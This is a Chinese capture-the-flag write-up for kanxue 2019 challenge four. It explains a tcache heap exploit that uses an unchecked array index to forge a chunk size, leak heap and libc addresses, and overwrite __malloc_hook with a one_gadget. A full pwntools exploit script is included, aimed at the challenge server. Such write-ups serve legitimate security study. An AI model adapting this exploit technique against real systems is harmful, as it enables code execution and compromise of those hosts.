-
-
[原创]kanxue2019第四题 writeup
-
2019-3-12 11:47 2210
-
通过对同一个chunk进行连续释放,确定是使用了tcache的libc版本。
因此是针对tcache的攻击利用。
程序漏洞:edit_singledog中,对数组索引下标没有进行检查,导致可以越界写luckdog的name字段。
首先通过两次save,得到两个tcache中chunk,然后再次申请回来一个,泄露堆地址。
然后越界写chunk的size字段(0x91),构造smallbin chunk,在对该chunk连续释放7次,使其填满tcache。再次释放一次后,该chunk进行unsorted bin,然后申请泄露libc地址(注意:该地址为small bin[0x90],因此要减去0xe0)。
然后修改name字段为malloc_hook,再次修改为one_gadget即可。
from pwn import * from ctypes import * import os #import roputils as rop remote_addr = "211.159.175.39" remote_port = 8686 local_addr = "127.0.0.1" local_port = 1807 pc = "./apwn" pwn_elf = ELF(pc) pwn_rop = rop.ROP(pc) uselibc = 2 #0 for no,1 for i386,2 for x64 local = 0 haslibc = 1 atta = 0 if uselibc == 2: context.arch = "amd64" else: context.arch = "i386" if uselibc ==2 and haslibc == 0: libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so") else: if uselibc == 1 and haslibc == 0: libc = ELF('/lib/i386-linux-gnu/libc-2.23.so') else: libc = ELF('./libc.so.6') if local == 1: if haslibc: p = process(pc,env={'LD_PRELOAD':'./libc.so.6'}) else: p = process(pc) elif local == 0: p = remote(remote_addr,remote_port) if haslibc: libc = ELF('./libc.so.6') else: p = remote(local_addr,local_port) if haslibc: libc = ELF('./libc.so.6') context.log_level = True if local: if atta: gdb.attach(p,'b *0xd86+0x555555554000\n') def sla(a,b): p.sendlineafter(a,b) def sa(a,b): p.sendafter(a,b) def ru(a): return p.recvuntil(a) def rv(a): return p.recv(a) def sn(a): p.send(a) def lg(s,addr): print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) def add_singledog(name): sla('>>\n','1') sa('Name:\n',name) def add_lovedog(name1,name2): sla('>>\n','2') sa('Name\n',name1) sa('name\n',name2) def edit_single(idx,name): sla('>>\n','3') sla('which?\n',str(idx)) sa('luck.\n',name) def edit_love(idx,name1,name2): sla('>>\n','4') sla('which?\n',str(idx)) sa('name?\n',name1) sa('name\n',name2) def save_dog(): sla('>>\n','5') def hack(): #raw_input() cnt = 12 for i in range(cnt): add_singledog('a') add_lovedog('b','b') save_dog() save_dog() add_singledog('\x10') edit_single(cnt-2,'\x10') ru('name: ') heap_addr = (u64(rv(6).ljust(8,'\x00')) & 0xfffffffffffff000) + 0x260 lg('heap_addr',heap_addr) for i in range(8): edit_single(0x50,p64(heap_addr-0x10)) edit_love(0,'a',p64(0)+p64(0x91)) edit_single(0x50,p64(heap_addr)) save_dog() #edit_single(0x50,p64(heap_addr-0x10)) add_singledog('a') add_singledog('a'*8) edit_single(4,'a'*8) ru('a'*8) libc.address = u64(rv(6).ljust(8,'\x00')) - 0xe0 - 0x3ebc40 lg('libc',libc.address) malloc_hook = libc.symbols['__malloc_hook'] one_gadget = libc.address + 0x10a38c #edit_single(0x50,p64(heap_addr-0x10)) #edit_love(0,'a',p64(0)+p64(0x31)) #edit_single(0x50,p64(heap_addr)) #save_dog() edit_single(0x50,p64(malloc_hook)) edit_love(0,'a',p64(one_gadget)) sla('>>\n','1') ''' add_singledog('a') add_singledog('b') add_lovedog('c1','c2') save_dog() save_dog() add_singledog('\x10') edit_single(0,'\x10') ru('name: ') heap_addr = u64(rv(6).ljust(8,'\x00')) - 0x10# - 0x130 lg('heap_addr',heap_addr) edit_single(0x50,p64(heap_addr)) edit_love(0,'a',p64(0)+p64(0x91)) edit_single(0x50,p64(heap_addr+0x10)) save_dog() add_singledog('a'*8) add_singledog('a') edit_single(1,'a') ru('a'*8) print hex(libc.symbols['__malloc_hook']) libc.address = u64(rv(6).ljust(8,'\x00')) - 0x58 - libc.symbols['__malloc_hook'] - 0x10 lg('libc',libc.address) #edit_single(50,p64(heap_addr+0x10)) ''' p.interactive() hack()
[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界
赞赏
他的文章
看原图